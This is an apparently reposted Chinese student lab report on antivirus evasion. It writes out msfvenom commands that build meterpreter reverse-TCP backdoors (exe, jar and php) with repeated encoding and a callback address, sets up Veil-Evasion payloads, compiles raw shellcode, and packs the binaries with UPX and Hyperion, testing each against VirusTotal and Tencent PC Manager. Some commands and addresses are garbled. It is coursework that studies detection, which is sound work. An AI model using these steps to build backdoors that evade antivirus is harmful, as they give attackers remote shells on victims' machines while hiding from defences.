1)正确使用msf编码器,msfvenom生成如jar之类的其他文件,veil-evasion,自己利用shellcode编程等免杀工具或技巧;
2)通过组合应用各种技术实现恶意代码免杀
(如果成功实现了免杀的,简单语言描述原理,不要截图。与杀软共生的结果验证要截图。)
3)用另一电脑实测,在杀软开启的情况下,可运行并回连成功,注明电脑的杀软名称与版本
(1)杀软是如何检测出恶意代码的?
答:AV厂商检测恶意软件的方式主流的就三种:
基于特征码的检测:每个程序都会有一段特征码,或者说是一段数据。杀毒软件可以检测某个程序的特征码是否包含恶意代码的特征码,以此来判定是否为恶意代码
启发式恶意软件检测:杀毒软件检测某个程序在系统中做的事情,是不是恶意代码做的事情。以此来判断是不是恶意代码
基于行为的恶意软件检测:也是启发式的一种,可以理解为加了监控模式的启发式检测
(2)免杀是做什么?
答:免杀就是就是让我们的恶意软件没法被以上三种方式找到。
(3)免杀的基本方法有哪些?
答:对于针对杀软基于特征码的检测方法,可以改变或者隐藏恶意代码的特征码。比如使用加壳或者是异或改变特征码。
msfvenom -p windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai -i 7 -b ‘\x00’ LHOST=192.168.199.255 LPORT=5229 -f exe > msd5229.exe
指令进行多次编码,生成.exe的后门程序使用virscan进行扫描,结果如下所示
大多数软件可以查杀该病毒,所以仅改变编码是不行的。
msfvenom -p java/meterpreter/reverse_tcp lhost=192.168.199.255 lport=5229 x> 5229met.jar
生成.jar的后门程序安全管家还是能轻易的查出他的问题
msfvenom -p php/meterpreter/reverse_tcp LHOST=192.168.199.255 LPORT=5229 x> 20165229_backdoor.php
指令
安全管家无法查杀.php文件
安装veil
git clone https://www.github.com/Veil-Framework/Veil-Evasion.git
lscd Veil-Evasion ls cd setup ls ./setup.sh
python Veil-Evasion.py
成功进入到菜单界面,可以看到当前一共有 51 种 payload 可用!我们可以使用 list 命令来查看 payload 的详细信息!根据 payload 编号,我们选择``6) c/meterpreter/rev_tcp```来进行演示依次输入命令set LHOST 192.168.199.266(Kali的IP),set LPORT 5229,options
用virustotal检测一下
还是被发现了,免杀做的还不够
vi 20165229.c
创建一个文件,将刚刚生成的unsigned char buf[]复制到其中
i686-w64-mingw32-g++ 20165229buf.c -o 20165229.exe
生成可执行文件事实证明,不得行,代码再复杂也没用。
加壳
- - -
加壳的全称应该是可执行程序资源压缩,压缩后的程序可以直接运行。
加壳的另一种常用的方式是在二进制的程序中植入一段代码,在运行的时候优先取得程序的控制权,之后再把控制权交还给原始代码,这样做的目的是为了隐藏程序真正的OEP(入口点,防止被破解)。大多数病毒就是基于此原理。
加壳的程序需要阻止外部程序或软件对加壳程序本身的反汇编分析或者动态分析,以达到保护壳内原始程序以及软件不被外部程序破坏,保证原始程序正常运行。
这种技术也常用来保护软件版权,防止软件被破解。但对于病毒,加壳可以绕过一些杀毒软件的扫描,从而实现它作为病毒的一些入侵或破坏的一些特性。
MSF的编码器使用类似方法,对shellcode进行再编码。
从技术上分壳分为:
upx 20165229buf.exe - o 5229_upxed.exe
腾讯电脑管家再登场
加密壳(Hyperion)
将5229_upxed.exe
拷贝到/usr/share/windows-binaries/hyperion/
目录中
进入目录 /usr/share/windows-binaries/hyperion/
中
输入指令wine hyperion.exe -v 5229_upxed.exe 5229_upxed_Hyperion.exe加壳
用virustotal检测如下
安全管家检测一下
veil53061.exe
加压缩壳受害者:win7虚拟机
杀毒软件:电脑管家13.3.20237.212
对2016529.exe加密壳,再压缩壳,生成5229buf_Hyperion_upxed.exe
5229buf_Hyperion_upxed.exe
进行扫描被发现了。。。。。
通过这次的免杀实验,我掌握了恶意代码躲避杀毒软件检测的方法,体会到了病毒程序的恐怖。发现了只要将恶意代码稍作修改,就能逃脱杀毒软件真的检测,可见最好的方法还是不下载不明软件,不点击不正规的网站,及时更新病毒库。...我也不知道我的安全管家怎么了,在实验中我每次把测试的恶意代码从kali拖到自己电脑时都没有安全警告提示,后来发现再打开就又了。可能他会云杀毒。
原文:https://www.cnblogs.com/zkkj/p/10633746.html